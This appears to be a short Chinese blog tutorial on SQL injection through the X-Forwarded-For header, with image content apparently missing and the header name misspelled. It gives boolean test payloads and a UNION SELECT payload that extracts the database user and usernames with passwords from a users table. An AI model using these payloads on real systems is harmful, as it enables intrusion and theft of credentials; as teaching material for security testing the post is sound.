13.xff注入攻击

原理
0
代码审计
0
 
0
黑盒测试下的xff注入攻击
0
 
0
在报文头部插入
X-Forwardcd-for:127.0.0.1'and 1=1#
0
插入
X-Forwardcd-for:127.0.0.1'and 1=2#
 
0
两次结果不一样,存在注入点
确认注入点
0
0
这里有四个注入点
0
进行联合查询
X-Forwardcd-for:-127.0.0.1'union select 1,2,user(),(select concat(username,password) from users limit 1)#
 
0
得到账号密码
posted @ 2023-11-11 10:36  白牧羊人  阅读(44)  评论(0编辑  收藏  举报